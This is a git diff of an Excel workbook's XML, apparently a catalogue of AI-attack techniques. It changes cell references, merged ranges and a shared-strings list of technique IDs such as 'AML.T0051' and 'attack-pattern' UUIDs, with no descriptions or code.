-      <c r="Q5" s="3" t="s">
-        <v>214</v>
-      </c>
-      <c r="T5" s="6"/>
-      <c r="U5" s="4" t="s">
-        <v>199</v>
-      </c>
-      <c r="V5" s="6"/>
-      <c r="W5" s="4" t="s">
-        <v>234</v>
-      </c>
-      <c r="X5" s="3" t="s">
-        <v>219</v>
-      </c>
-    </row>
-    <row r="6" spans="1:25">
-      <c r="A6" s="6" t="s">
+        <v>289</v>
+      </c>
+      <c r="H5" s="6"/>
+      <c r="I5" s="4" t="s">
+        <v>262</v>
+      </c>
+      <c r="J5" s="3" t="s">
+        <v>291</v>
+      </c>
+      <c r="M5" s="3" t="s">
+        <v>273</v>
+      </c>
+      <c r="P5" s="6" t="s">
+        <v>241</v>
+      </c>
+      <c r="Q5" s="4" t="s">
+        <v>307</v>
+      </c>
+      <c r="S5" s="6"/>
+      <c r="T5" s="4" t="s">
+        <v>225</v>
+      </c>
+      <c r="U5" s="6"/>
+      <c r="V5" s="4" t="s">
         <v>266</v>
       </c>
-      <c r="B6" s="4" t="s">
-        <v>235</v>
+      <c r="W5" s="3" t="s">
+        <v>247</v>
+      </c>
+    </row>
+    <row r="6" spans="1:24">
+      <c r="A6" s="3" t="s">
+        <v>301</v>
       </c>
       <c r="C6" s="3" t="s">
-        <v>210</v>
+        <v>237</v>
       </c>
       <c r="D6" s="4" t="s">
-        <v>196</v>
-      </c>
-      <c r="E6" s="6" t="s">
-        <v>246</v>
-      </c>
+        <v>222</v>
+      </c>
+      <c r="E6" s="6"/>
       <c r="F6" s="4" t="s">
-        <v>205</v>
+        <v>279</v>
+      </c>
+      <c r="H6" s="3" t="s">
+        <v>316</v>
+      </c>
+      <c r="I6" s="4" t="s">
+        <v>313</v>
       </c>
       <c r="J6" s="3" t="s">
-        <v>241</v>
-      </c>
-      <c r="Q6" s="3" t="s">
-        <v>215</v>
-      </c>
-      <c r="T6" s="6"/>
-      <c r="U6" s="4" t="s">
-        <v>233</v>
-      </c>
-      <c r="V6" s="3" t="s">
-        <v>236</v>
-      </c>
-      <c r="X6" s="3" t="s">
-        <v>221</v>
-      </c>
-    </row>
-    <row r="7" spans="1:25">
-      <c r="A7" s="6"/>
+        <v>296</v>
+      </c>
+      <c r="M6" s="3" t="s">
+        <v>275</v>
+      </c>
+      <c r="P6" s="6"/>
+      <c r="Q6" s="4" t="s">
+        <v>308</v>
+      </c>
+      <c r="S6" s="6"/>
+      <c r="T6" s="4" t="s">
+        <v>265</v>
+      </c>
+      <c r="U6" s="3" t="s">
+        <v>254</v>
+      </c>
+      <c r="W6" s="3" t="s">
+        <v>249</v>
+      </c>
+    </row>
+    <row r="7" spans="1:24">
+      <c r="A7" s="6" t="s">
+        <v>302</v>
+      </c>
       <c r="B7" s="4" t="s">
-        <v>258</v>
+        <v>267</v>
       </c>
       <c r="C7" s="3" t="s">
-        <v>220</v>
+        <v>248</v>
       </c>
       <c r="E7" s="6"/>
       <c r="F7" s="4" t="s">
-        <v>229</v>
-      </c>
-      <c r="J7" s="3" t="s">
+        <v>284</v>
+      </c>
+      <c r="P7" s="6"/>
+      <c r="Q7" s="4" t="s">
+        <v>309</v>
+      </c>
+      <c r="S7" s="6"/>
+      <c r="T7" s="4" t="s">
+        <v>283</v>
+      </c>
+      <c r="U7" s="3" t="s">
+        <v>268</v>
+      </c>
+      <c r="W7" s="6" t="s">
+        <v>253</v>
+      </c>
+      <c r="X7" s="4" t="s">
         <v>257</v>
       </c>
-      <c r="Q7" s="3" t="s">
-        <v>216</v>
-      </c>
-      <c r="T7" s="6"/>
-      <c r="U7" s="4" t="s">
-        <v>249</v>
-      </c>
-      <c r="V7" s="3" t="s">
-        <v>238</v>
-      </c>
-      <c r="X7" s="6" t="s">
-        <v>225</v>
-      </c>
-      <c r="Y7" s="4" t="s">
-        <v>227</v>
-      </c>
-    </row>
-    <row r="8" spans="1:25">
+    </row>
+    <row r="8" spans="1:24">
       <c r="A8" s="6"/>
       <c r="B8" s="4" t="s">
+        <v>292</v>
+      </c>
+      <c r="C8" s="3" t="s">
         <v>271</v>
       </c>
-      <c r="C8" s="6" t="s">
-        <v>252</v>
-      </c>
-      <c r="D8" s="4" t="s">
-        <v>195</v>
-      </c>
-      <c r="E8" s="6"/>
+      <c r="E8" s="3" t="s">
+        <v>287</v>
+      </c>
       <c r="F8" s="4" t="s">
-        <v>245</v>
-      </c>
-      <c r="Q8" s="3" t="s">
-        <v>238</v>
-      </c>
-      <c r="T8" s="6"/>
-      <c r="U8" s="4" t="s">
-        <v>281</v>
-      </c>
-      <c r="X8" s="6"/>
-      <c r="Y8" s="4" t="s">
+        <v>306</v>
+      </c>
+      <c r="P8" s="3" t="s">
+        <v>242</v>
+      </c>
+      <c r="S8" s="6"/>
+      <c r="T8" s="4" t="s">
+        <v>320</v>
+      </c>
+      <c r="W8" s="6"/>
+      <c r="X8" s="4" t="s">
+        <v>278</v>
+      </c>
+    </row>
+    <row r="9" spans="1:24">
+      <c r="A9" s="6"/>
+      <c r="B9" s="4" t="s">
+        <v>310</v>
+      </c>
+      <c r="C9" s="6" t="s">
+        <v>286</v>
+      </c>
+      <c r="D9" s="4" t="s">
+        <v>221</v>
+      </c>
+      <c r="E9" s="3" t="s">
+        <v>318</v>
+      </c>
+      <c r="P9" s="3" t="s">
+        <v>243</v>
+      </c>
+      <c r="S9" s="6" t="s">
+        <v>231</v>
+      </c>
+      <c r="T9" s="4" t="s">
+        <v>311</v>
+      </c>
+      <c r="W9" s="6"/>
+      <c r="X9" s="4" t="s">
+        <v>297</v>
+      </c>
+    </row>
+    <row r="10" spans="1:24">
+      <c r="C10" s="6"/>
+      <c r="D10" s="4" t="s">
+        <v>304</v>
+      </c>
+      <c r="P10" s="3" t="s">
         <v>244</v>
       </c>
-    </row>
-    <row r="9" spans="1:25">
-      <c r="C9" s="6"/>
-      <c r="D9" s="4" t="s">
-        <v>268</v>
-      </c>
-      <c r="E9" s="6"/>
-      <c r="F9" s="4" t="s">
-        <v>250</v>
-      </c>
-      <c r="T9" s="6" t="s">
-        <v>204</v>
-      </c>
-      <c r="U9" s="4" t="s">
-        <v>272</v>
-      </c>
-      <c r="X9" s="6"/>
-      <c r="Y9" s="4" t="s">
-        <v>262</v>
-      </c>
-    </row>
-    <row r="10" spans="1:25">
-      <c r="C10" s="3" t="s">
-        <v>257</v>
-      </c>
-      <c r="E10" s="3" t="s">
-        <v>253</v>
-      </c>
-      <c r="F10" s="4" t="s">
-        <v>270</v>
-      </c>
-      <c r="T10" s="6"/>
-      <c r="U10" s="4" t="s">
-        <v>273</v>
-      </c>
-      <c r="X10" s="6"/>
-      <c r="Y10" s="4" t="s">
-        <v>267</v>
-      </c>
-    </row>
-    <row r="11" spans="1:25">
+      <c r="S10" s="6"/>
+      <c r="T10" s="4" t="s">
+        <v>312</v>
+      </c>
+      <c r="W10" s="6"/>
+      <c r="X10" s="4" t="s">
+        <v>303</v>
+      </c>
+    </row>
+    <row r="11" spans="1:24">
       <c r="C11" s="3" t="s">
-        <v>259</v>
-      </c>
-      <c r="E11" s="3" t="s">
-        <v>279</v>
-      </c>
-      <c r="T11" s="6"/>
-      <c r="U11" s="4" t="s">
-        <v>276</v>
-      </c>
-      <c r="X11" s="6"/>
-      <c r="Y11" s="4" t="s">
-        <v>278</v>
-      </c>
-    </row>
-    <row r="12" spans="1:25">
+        <v>291</v>
+      </c>
+      <c r="S11" s="6"/>
+      <c r="T11" s="4" t="s">
+        <v>315</v>
+      </c>
+      <c r="W11" s="6"/>
+      <c r="X11" s="4" t="s">
+        <v>317</v>
+      </c>
+    </row>
+    <row r="12" spans="1:24">
       <c r="C12" s="3" t="s">
-        <v>260</v>
-      </c>
-      <c r="T12" s="3" t="s">
-        <v>280</v>
-      </c>
-      <c r="X12" s="3" t="s">
-        <v>269</v>
-      </c>
-    </row>
-    <row r="13" spans="1:25">
+        <v>293</v>
+      </c>
+      <c r="S12" s="3" t="s">
+        <v>319</v>
+      </c>
+      <c r="W12" s="3" t="s">
+        <v>305</v>
+      </c>
+    </row>
+    <row r="13" spans="1:24">
       <c r="C13" s="3" t="s">
-        <v>261</v>
+        <v>294</v>
+      </c>
+    </row>
+    <row r="14" spans="1:24">
+      <c r="C14" s="3" t="s">
+        <v>295</v>
+      </c>
+    </row>
+    <row r="15" spans="1:24">
+      <c r="C15" s="3" t="s">
+        <v>298</v>
       </c>
     </row>
   </sheetData>
-  <mergeCells count="27">
-    <mergeCell ref="A6:A8"/>
+  <mergeCells count="24">
+    <mergeCell ref="A7:A9"/>
     <mergeCell ref="A1:B1"/>
     <mergeCell ref="C2:C3"/>
     <mergeCell ref="C4:C5"/>
-    <mergeCell ref="C8:C9"/>
+    <mergeCell ref="C9:C10"/>
     <mergeCell ref="C1:D1"/>
-    <mergeCell ref="E4:E5"/>
-    <mergeCell ref="E6:E9"/>
+    <mergeCell ref="E4:E7"/>
     <mergeCell ref="E1:F1"/>
+    <mergeCell ref="H4:H5"/>
     <mergeCell ref="H1:I1"/>
     <mergeCell ref="J2:J3"/>
-    <mergeCell ref="J4:J5"/>
     <mergeCell ref="J1:K1"/>
-    <mergeCell ref="L4:L5"/>
-    <mergeCell ref="L1:M1"/>
-    <mergeCell ref="N4:N5"/>
-    <mergeCell ref="N1:O1"/>
-    <mergeCell ref="Q3:Q4"/>
-    <mergeCell ref="Q1:R1"/>
-    <mergeCell ref="T2:T3"/>
-    <mergeCell ref="T4:T8"/>
-    <mergeCell ref="T9:T11"/>
-    <mergeCell ref="T1:U1"/>
-    <mergeCell ref="V3:V5"/>
-    <mergeCell ref="V1:W1"/>
-    <mergeCell ref="X7:X11"/>
-    <mergeCell ref="X1:Y1"/>
+    <mergeCell ref="M1:N1"/>
+    <mergeCell ref="P3:P4"/>
+    <mergeCell ref="P5:P7"/>
+    <mergeCell ref="P1:Q1"/>
+    <mergeCell ref="S2:S3"/>
+    <mergeCell ref="S4:S8"/>
+    <mergeCell ref="S9:S11"/>
+    <mergeCell ref="S1:T1"/>
+    <mergeCell ref="U3:U5"/>
+    <mergeCell ref="U1:V1"/>
+    <mergeCell ref="W7:W11"/>
+    <mergeCell ref="W1:X1"/>
   </mergeCells>
   <pageMargins left="0.7" right="0.7" top="0.75" bottom="0.75" header="0.3" footer="0.3"/>
 </worksheet>

--- a/excel-files/atlas.xlsx
+++ b/excel-files/atlas.xlsx
@@ -17,7 +17,7 @@
 </file>
 
 <file path=xl/sharedStrings.xml><?xml version="1.0" encoding="utf-8"?>
-<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="1390" uniqueCount="737">
+<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="1509" uniqueCount="797">
   <si>
     <t>ID</t>
   </si>
@@ -46,9 +46,27 @@
     <t>platforms</t>
   </si>
   <si>
+    <t>AML.T0035</t>
+  </si>
+  <si>
+    <t>AML.T0008.000</t>
+  </si>
+  <si>
+    <t>AML.T0048.004</t>
+  </si>
+  <si>
     <t>AML.T0040</t>
   </si>
   <si>
+    <t>AML.T0010.001</t>
+  </si>
+  <si>
+    <t>AML.T0010</t>
+  </si>
+  <si>
+    <t>AML.T0047</t>
+  </si>
+  <si>
     <t>AML.T0008</t>
   </si>
   <si>
@@ -64,195 +82,201 @@
     <t>AML.T0017.000</t>
   </si>
   <si>
+    <t>AML.T0043.001</t>
+  </si>
+  <si>
+    <t>AML.T0043.002</t>
+  </si>
+  <si>
+    <t>AML.T0067.000</t>
+  </si>
+  <si>
+    <t>AML.T0075</t>
+  </si>
+  <si>
+    <t>AML.T0050</t>
+  </si>
+  <si>
+    <t>AML.T0008.001</t>
+  </si>
+  <si>
+    <t>AML.T0010.004</t>
+  </si>
+  <si>
+    <t>AML.T0076</t>
+  </si>
+  <si>
+    <t>AML.T0034</t>
+  </si>
+  <si>
+    <t>AML.T0043</t>
+  </si>
+  <si>
+    <t>AML.T0005</t>
+  </si>
+  <si>
+    <t>AML.T0010.002</t>
+  </si>
+  <si>
+    <t>AML.T0036</t>
+  </si>
+  <si>
+    <t>AML.T0037</t>
+  </si>
+  <si>
+    <t>AML.T0002.000</t>
+  </si>
+  <si>
+    <t>AML.T0029</t>
+  </si>
+  <si>
+    <t>AML.T0017</t>
+  </si>
+  <si>
+    <t>AML.T0051.000</t>
+  </si>
+  <si>
+    <t>AML.T0007</t>
+  </si>
+  <si>
+    <t>AML.T0014</t>
+  </si>
+  <si>
+    <t>AML.T0013</t>
+  </si>
+  <si>
+    <t>AML.T0063</t>
+  </si>
+  <si>
+    <t>AML.T0062</t>
+  </si>
+  <si>
+    <t>AML.T0069</t>
+  </si>
+  <si>
+    <t>AML.T0008.002</t>
+  </si>
+  <si>
+    <t>AML.T0078</t>
+  </si>
+  <si>
+    <t>AML.T0018.002</t>
+  </si>
+  <si>
+    <t>AML.T0031</t>
+  </si>
+  <si>
+    <t>AML.T0059</t>
+  </si>
+  <si>
+    <t>AML.T0021</t>
+  </si>
+  <si>
+    <t>AML.T0015</t>
+  </si>
+  <si>
+    <t>AML.T0024</t>
+  </si>
+  <si>
+    <t>AML.T0025</t>
+  </si>
+  <si>
+    <t>AML.T0049</t>
+  </si>
+  <si>
+    <t>AML.T0048</t>
+  </si>
+  <si>
+    <t>AML.T0024.002</t>
+  </si>
+  <si>
+    <t>AML.T0056</t>
+  </si>
+  <si>
+    <t>AML.T0071</t>
+  </si>
+  <si>
+    <t>AML.T0048.000</t>
+  </si>
+  <si>
+    <t>AML.T0044</t>
+  </si>
+  <si>
+    <t>AML.T0064</t>
+  </si>
+  <si>
+    <t>AML.T0016.002</t>
+  </si>
+  <si>
+    <t>AML.T0010.000</t>
+  </si>
+  <si>
+    <t>AML.T0073</t>
+  </si>
+  <si>
+    <t>AML.T0051.001</t>
+  </si>
+  <si>
+    <t>AML.T0024.000</t>
+  </si>
+  <si>
+    <t>AML.T0043.004</t>
+  </si>
+  <si>
+    <t>AML.T0024.001</t>
+  </si>
+  <si>
+    <t>AML.T0000.000</t>
+  </si>
+  <si>
+    <t>AML.T0057</t>
+  </si>
+  <si>
+    <t>AML.T0054</t>
+  </si>
+  <si>
+    <t>AML.T0053</t>
+  </si>
+  <si>
+    <t>AML.T0065</t>
+  </si>
+  <si>
+    <t>AML.T0051</t>
+  </si>
+  <si>
+    <t>AML.T0068</t>
+  </si>
+  <si>
+    <t>AML.T0061</t>
+  </si>
+  <si>
+    <t>AML.T0077</t>
+  </si>
+  <si>
+    <t>AML.T0067</t>
+  </si>
+  <si>
+    <t>AML.T0011.001</t>
+  </si>
+  <si>
     <t>AML.T0018</t>
   </si>
   <si>
-    <t>AML.T0043.001</t>
-  </si>
-  <si>
-    <t>AML.T0043.002</t>
-  </si>
-  <si>
-    <t>AML.T0067.000</t>
-  </si>
-  <si>
-    <t>AML.T0050</t>
-  </si>
-  <si>
-    <t>AML.T0008.001</t>
-  </si>
-  <si>
-    <t>AML.T0034</t>
-  </si>
-  <si>
-    <t>AML.T0043</t>
-  </si>
-  <si>
-    <t>AML.T0005</t>
-  </si>
-  <si>
-    <t>AML.T0010.002</t>
-  </si>
-  <si>
-    <t>AML.T0036</t>
-  </si>
-  <si>
-    <t>AML.T0037</t>
-  </si>
-  <si>
-    <t>AML.T0002.000</t>
-  </si>
-  <si>
-    <t>AML.T0029</t>
-  </si>
-  <si>
-    <t>AML.T0017</t>
-  </si>
-  <si>
-    <t>AML.T0051.000</t>
-  </si>
-  <si>
-    <t>AML.T0063</t>
-  </si>
-  <si>
-    <t>AML.T0062</t>
-  </si>
-  <si>
-    <t>AML.T0069</t>
-  </si>
-  <si>
-    <t>AML.T0007</t>
-  </si>
-  <si>
-    <t>AML.T0014</t>
-  </si>
-  <si>
-    <t>AML.T0013</t>
-  </si>
-  <si>
-    <t>AML.T0008.002</t>
-  </si>
-  <si>
-    <t>AML.T0059</t>
-  </si>
-  <si>
-    <t>AML.T0031</t>
-  </si>
-  <si>
-    <t>AML.T0021</t>
-  </si>
-  <si>
-    <t>AML.T0015</t>
-  </si>
-  <si>
-    <t>AML.T0025</t>
-  </si>
-  <si>
-    <t>AML.T0024</t>
-  </si>
-  <si>
-    <t>AML.T0049</t>
-  </si>
-  <si>
-    <t>AML.T0048</t>
-  </si>
-  <si>
-    <t>AML.T0056</t>
-  </si>
-  <si>
-    <t>AML.T0024.002</t>
-  </si>
-  <si>
-    <t>AML.T0071</t>
-  </si>
-  <si>
-    <t>AML.T0048.000</t>
-  </si>
-  <si>
-    <t>AML.T0044</t>
-  </si>
-  <si>
-    <t>AML.T0064</t>
-  </si>
-  <si>
-    <t>AML.T0016.002</t>
-  </si>
-  <si>
-    <t>AML.T0010.000</t>
-  </si>
-  <si>
-    <t>AML.T0051.001</t>
-  </si>
-  <si>
-    <t>AML.T0024.000</t>
+    <t>AML.T0043.003</t>
+  </si>
+  <si>
+    <t>AML.T0074</t>
+  </si>
+  <si>
+    <t>AML.T0010.003</t>
+  </si>
+  <si>
+    <t>AML.T0002.001</t>
   </si>
   <si>
     <t>AML.T0018.001</t>
   </si>
   <si>
-    <t>AML.T0043.004</t>
-  </si>
-  <si>
-    <t>AML.T0024.001</t>
-  </si>
-  <si>
-    <t>AML.T0000.000</t>
-  </si>
-  <si>
-    <t>AML.T0057</t>
-  </si>
-  <si>
-    <t>AML.T0054</t>
-  </si>
-  <si>
-    <t>AML.T0053</t>
-  </si>
-  <si>
-    <t>AML.T0065</t>
-  </si>
-  <si>
-    <t>AML.T0051</t>
-  </si>
-  <si>
-    <t>AML.T0068</t>
-  </si>
-  <si>
-    <t>AML.T0061</t>
-  </si>
-  <si>
-    <t>AML.T0067</t>
-  </si>
-  <si>
-    <t>AML.T0035</t>
-  </si>
-  <si>
-    <t>AML.T0008.000</t>
-  </si>
-  <si>
-    <t>AML.T0048.004</t>
-  </si>
-  <si>
-    <t>AML.T0010.001</t>
-  </si>
-  <si>
-    <t>AML.T0010</t>
-  </si>
-  <si>
-    <t>AML.T0047</t>
-  </si>
-  <si>
-    <t>AML.T0011.001</t>
-  </si>
-  <si>
-    <t>AML.T0043.003</t>
-  </si>
-  <si>
-    <t>AML.T0010.003</t>
-  </si>
-  <si>
-    <t>AML.T0002.001</t>
-  </si>
-  <si>
     <t>AML.T0016</t>
   </si>
   <si>
@@ -292,16 +316,22 @@
     <t>AML.T0066</t>
   </si>
   <si>
+    <t>AML.T0072</t>
+  </si>
+  <si>
     <t>AML.T0004</t>
   </si>
   <si>
+    <t>AML.T0001</t>
+  </si>
+  <si>
+    <t>AML.T0000</t>
+  </si>
+  <si>
     <t>AML.T0003</t>
   </si>
   <si>
-    <t>AML.T0001</t>
-  </si>
-  <si>
-    <t>AML.T0000</t>
+    <t>AML.T0008.004</t>
   </si>
   <si>
     <t>AML.T0048.002</t>
@@ -319,6 +349,9 @@
     <t>AML.T0069.000</t>
   </si>
   <si>
+    <t>AML.T0079</t>
+  </si>
+  <si>
     <t>AML.T0069.001</t>
   </si>
   <si>
@@ -358,337 +391,385 @@
     <t>AML.T0043.000</t>
   </si>
   <si>
-    <t>attack-pattern--da8fff4a-bfff-4fe2-9d45-1c01fd9d3b73</t>
-  </si>
-  <si>
-    <t>attack-pattern--3821f3bc-85b6-4090-9061-96f19a1a5582</t>
-  </si>
-  <si>
-    <t>attack-pattern--c652f980-4fff-47ae-8119-d6a927255ebc</t>
-  </si>
-  <si>
-    <t>attack-pattern--40688955-5558-47a9-ad37-393d75b4107f</t>
-  </si>
-  <si>
-    <t>attack-pattern--341c0beb-7a50-4669-8abc-fb6e22e96807</t>
-  </si>
-  <si>
-    <t>attack-pattern--01ac9ace-7f47-4082-ad0a-62e1696478e8</t>
-  </si>
-  <si>
-    <t>attack-pattern--2ea7686d-a65f-4e06-b962-02495a8f1cdb</t>
-  </si>
-  <si>
-    <t>attack-pattern--fb1d969f-a88b-4404-a1a5-36fc7eab7c41</t>
-  </si>
-  <si>
-    <t>attack-pattern--8f1fef8f-0971-4171-a7a3-2a2e9b7c087c</t>
-  </si>
-  <si>
-    <t>attack-pattern--ce2d3599-8f7a-495e-aa86-05311ba51356</t>
-  </si>
-  <si>
-    <t>attack-pattern--15cf5a0f-8aab-45b1-aea7-f163d6be9d92</t>
-  </si>
-  <si>
-    <t>attack-pattern--9a779962-38cd-4b1e-94f7-ff704d090dd6</t>
-  </si>
-  <si>
-    <t>attack-pattern--71236163-a6a2-48d2-aee5-df2c480df0d7</t>
-  </si>
-  <si>
-    <t>attack-pattern--d3cfc2f0-87dc-4fb1-8a0d-9b5cf7d10484</t>
-  </si>
-  <si>
-    <t>attack-pattern--ee609ad3-6280-4514-85af-b00798a78e84</t>
-  </si>
-  <si>
-    <t>attack-pattern--4c34c31f-5157-48ad-acb8-4344cadd93cf</t>
-  </si>
-  <si>
-    <t>attack-pattern--42caf4ac-db7b-4dd4-9299-06d39dd3d8d2</t>
-  </si>
-  <si>
-    <t>attack-pattern--25865eb8-7709-4e3b-9d43-878646f8f5a5</t>
-  </si>
-  <si>
-    <t>attack-pattern--f85d3313-5de8-4d27-9d23-bf3fa79946e5</t>
-  </si>
-  <si>
-    <t>attack-pattern--861e7c2c-3f39-4131-b657-d9d9149189d0</t>
-  </si>
-  <si>
-    <t>attack-pattern--ca864493-d868-4671-ba43-b721b10a5bba</t>
-  </si>
-  <si>
-    <t>attack-pattern--dcce6e07-56ea-416a-a15b-7693f0f0d631</t>
-  </si>
-  <si>
-    <t>attack-pattern--737e473c-ed93-4f70-95a0-9c1ae74390bb</t>
-  </si>
-  <si>
-    <t>attack-pattern--8d2b6be6-f86e-4b55-97de-491979e9cf2a</t>
-  </si>
-  <si>
-    <t>attack-pattern--63388116-e4dd-45c5-8021-74bfd69e66a0</t>
-  </si>
-  <si>
-    <t>attack-pattern--8a47d00f-77c8-4144-8452-facca3096fa3</t>
-  </si>
-  <si>
-    <t>attack-pattern--9115a9b6-855a-4acf-802c-aad9eeedc310</t>
-  </si>
-  <si>
-    <t>attack-pattern--b99c824b-c87f-4e39-ba72-7b8b299f0039</t>
-  </si>
-  <si>
-    <t>attack-pattern--ce19e9c5-1006-43af-a6de-cd16021be9f5</t>
-  </si>
-  <si>
-    <t>attack-pattern--07179795-e764-4d6a-a105-7fc73bd970ff</t>
-  </si>
-  <si>
-    <t>attack-pattern--4b0d8468-e00f-4ba2-9e18-1a2f527f08b2</t>
-  </si>
-  <si>
-    <t>attack-pattern--becf223c-e8c2-41f7-85b6-d29859ca95d7</t>
-  </si>
-  <si>
-    <t>attack-pattern--ccf27b22-48bf-4219-a668-fa60eb0d94a4</t>
-  </si>
-  <si>
-    <t>attack-pattern--55a17dc0-be82-40b8-80e7-f97e1e867b58</t>
-  </si>
-  <si>
-    <t>attack-pattern--3f333baa-31b3-4196-966c-5298a8b106c5</t>
-  </si>
-  <si>
-    <t>attack-pattern--33fd1b84-34af-473e-a0cf-99bb1dec61c6</t>
-  </si>
-  <si>
-    <t>attack-pattern--60eeb103-32b3-429f-895e-99c229e1181e</t>
-  </si>
-  <si>
-    <t>attack-pattern--b68a2222-7aba-4a03-9f64-20e89faf4ec6</t>
-  </si>
-  <si>
-    <t>attack-pattern--9ab0c79a-4dcf-4270-a272-af080402402d</t>
-  </si>
-  <si>
-    <t>attack-pattern--96d40a8c-f6ff-4f15-97b0-aa2b678fd743</t>
-  </si>
-  <si>
-    <t>attack-pattern--968c7b7f-6bb4-4d0e-bbab-3098ce12b4ce</t>
-  </si>
-  <si>
-    <t>attack-pattern--07ebffc5-e98e-4330-bf94-7f0c56b16345</t>
-  </si>
-  <si>
-    <t>attack-pattern--5eb94c9f-0db2-4f09-9458-60467f9daeb2</t>
-  </si>
-  <si>
-    <t>attack-pattern--55906ca3-dcfa-46d0-ade8-da3c6554984d</t>
-  </si>
-  <si>
-    <t>attack-pattern--39d1fb41-32e9-4909-bc4d-acb4751b118b</t>
-  </si>
-  <si>
-    <t>attack-pattern--3897f551-0533-4714-b8de-47e3879e42ae</t>
-  </si>
-  <si>
-    <t>attack-pattern--02c2f3c6-678a-40f7-997b-a3faa54a5760</t>
-  </si>
-  <si>
-    <t>attack-pattern--294fe4dc-ac27-4b40-ae40-8148b9876f25</t>
-  </si>
-  <si>
-    <t>attack-pattern--09d078c4-833c-4d5c-a69c-5066d8c6917b</t>
-  </si>
-  <si>
-    <t>attack-pattern--93c93189-92f6-4485-8ddf-6c5e501f416f</t>
-  </si>
-  <si>
-    <t>attack-pattern--78f299a3-0032-47c4-8841-aa9f8c226398</t>
-  </si>
-  <si>
-    <t>attack-pattern--ab05c807-8854-40d8-a20e-28edae445c80</t>
-  </si>
-  <si>
-    <t>attack-pattern--8bc3f855-f8ba-46c1-85a7-a036679ed8b6</t>
-  </si>
-  <si>
-    <t>attack-pattern--151bebab-0e27-442b-838e-bb0d9a36c32f</t>
-  </si>
-  <si>
-    <t>attack-pattern--8dee1775-3523-439c-948d-99a5387645f9</t>
-  </si>
-  <si>
-    <t>attack-pattern--f9eddd08-a29a-4598-80a4-171d456be7c7</t>
-  </si>
-  <si>
-    <t>attack-pattern--135cc710-eaed-4a45-828b-651a3cc78a72</t>
-  </si>
-  <si>
-    <t>attack-pattern--e50d39d3-4be4-465a-8b98-e35c1637a898</t>
-  </si>
-  <si>
-    <t>attack-pattern--b91523ae-ada9-4ad1-a112-0113f29462fd</t>
-  </si>
-  <si>
-    <t>attack-pattern--6a67aef8-329e-4669-84bd-c1aa0a67ac68</t>
-  </si>
-  <si>
-    <t>attack-pattern--73458135-2102-4753-ad0a-f74ae73c4038</t>
-  </si>
-  <si>
-    <t>attack-pattern--7360aac5-ab15-4d95-ab5e-bef1af305788</t>
-  </si>
-  <si>
-    <t>attack-pattern--f9590f8d-cb5f-47ba-a25d-76a237dd8904</t>
-  </si>
-  <si>
-    <t>attack-pattern--a4783291-4917-4ea8-8f34-b9b6180ae332</t>
-  </si>
-  <si>
-    <t>attack-pattern--e4653a0a-5832-4c26-ab98-e31a31936085</t>
-  </si>
-  <si>
-    <t>attack-pattern--f2d925fe-4436-4d33-83b1-2d4ee500c2cc</t>
-  </si>
-  <si>
-    <t>attack-pattern--a3263fd3-29c5-4881-84f8-fc72d3c91c71</t>
-  </si>
-  <si>
-    <t>attack-pattern--d3301bd5-0f28-4604-a167-15aa4f17160d</t>
-  </si>
-  <si>
-    <t>attack-pattern--784cbb90-b5f0-47d1-af8c-d299c5b3c551</t>
-  </si>
-  <si>
-    <t>attack-pattern--17b04e23-b6a0-4e72-9094-dc9677d07436</t>
-  </si>
-  <si>
-    <t>attack-pattern--1c639b2f-42ad-4613-958d-507b7270ee6a</t>
-  </si>
-  <si>
-    <t>attack-pattern--b7cb2827-30e5-4d66-b092-f26fbbbdfa18</t>
-  </si>
-  <si>
-    <t>attack-pattern--2693de2c-725f-4d66-abb2-a940efcff1b5</t>
-  </si>
-  <si>
-    <t>attack-pattern--c44decce-8b70-4f42-a5e0-db0bb105d0b4</t>
-  </si>
-  <si>
-    <t>attack-pattern--d63c873b-7e01-437d-98ef-d681099c3377</t>
-  </si>
-  <si>
-    <t>attack-pattern--a0b808b3-648d-4fd3-91d1-6b3baab37832</t>
-  </si>
-  <si>
-    <t>attack-pattern--4f65193d-97ad-4231-8934-f5f7c7e7237f</t>
-  </si>
-  <si>
-    <t>attack-pattern--89461ddf-4d27-40e7-ba53-8221012fe9c1</t>
-  </si>
-  <si>
-    <t>attack-pattern--97fe9577-c7ed-466d-817d-697f815db7b0</t>
-  </si>
-  <si>
-    <t>attack-pattern--3898e02f-8eda-4360-aba5-9ee37943538c</t>
-  </si>
-  <si>
-    <t>attack-pattern--b32fbde1-97bc-41a1-bcea-04d32aa7e44e</t>
-  </si>
-  <si>
-    <t>attack-pattern--1c02a88b-8f6c-45f3-bcc8-8045a74d9103</t>
-  </si>
-  <si>
-    <t>attack-pattern--6f3e625e-3157-4b30-bb7f-f8f25b21c8dc</t>
-  </si>
-  <si>
-    <t>attack-pattern--d886ab0c-9c92-40f6-aad8-930476504be8</t>
-  </si>
-  <si>
-    <t>attack-pattern--9c9e3e54-a786-4511-a4c5-62f3e216febe</t>
-  </si>
-  <si>
-    <t>attack-pattern--0e9e22e3-9b1e-4a9d-8ff6-da7ba7b9018f</t>
-  </si>
-  <si>
-    <t>attack-pattern--3d0887a8-d7fa-4820-96b9-ab087f6cd70b</t>
-  </si>
-  <si>
-    <t>attack-pattern--f0b63383-fff7-499c-9dce-56e0d9f87742</t>
-  </si>
-  <si>
-    <t>attack-pattern--5d68a5e9-942d-4213-9c6c-ac27d9fb786c</t>
-  </si>
-  <si>
-    <t>attack-pattern--c0fc514b-0748-4a53-8a45-4fde867c8ef1</t>
-  </si>
-  <si>
-    <t>attack-pattern--e871484e-8be8-4b75-9ec4-a6a494282bcd</t>
-  </si>
-  <si>
-    <t>attack-pattern--0599abae-6ad1-439f-8c53-63d24e0c940a</t>
-  </si>
-  <si>
-    <t>attack-pattern--338ed75b-40fc-40b9-9880-e4c9c9f98674</t>
-  </si>
-  <si>
-    <t>attack-pattern--620feb23-65d5-4b26-a0c4-d38cbd397258</t>
-  </si>
-  <si>
-    <t>attack-pattern--8e6e76e6-3e86-4317-ac4c-197a104d937a</t>
-  </si>
-  <si>
-    <t>attack-pattern--f9408f13-6211-4259-85e1-794dc96a6100</t>
-  </si>
-  <si>
-    <t>attack-pattern--df46bcf0-0231-413c-9661-7f7d0e39b63e</t>
-  </si>
-  <si>
-    <t>attack-pattern--3162b9bd-2bed-4d55-a1f5-7fb9ddccf609</t>
-  </si>
-  <si>
-    <t>attack-pattern--5f25a27a-5459-434a-81c7-633a2cb98521</t>
-  </si>
-  <si>
-    <t>attack-pattern--fe45ad62-1ed6-45fb-a6ba-19140fed8cda</t>
-  </si>
-  <si>
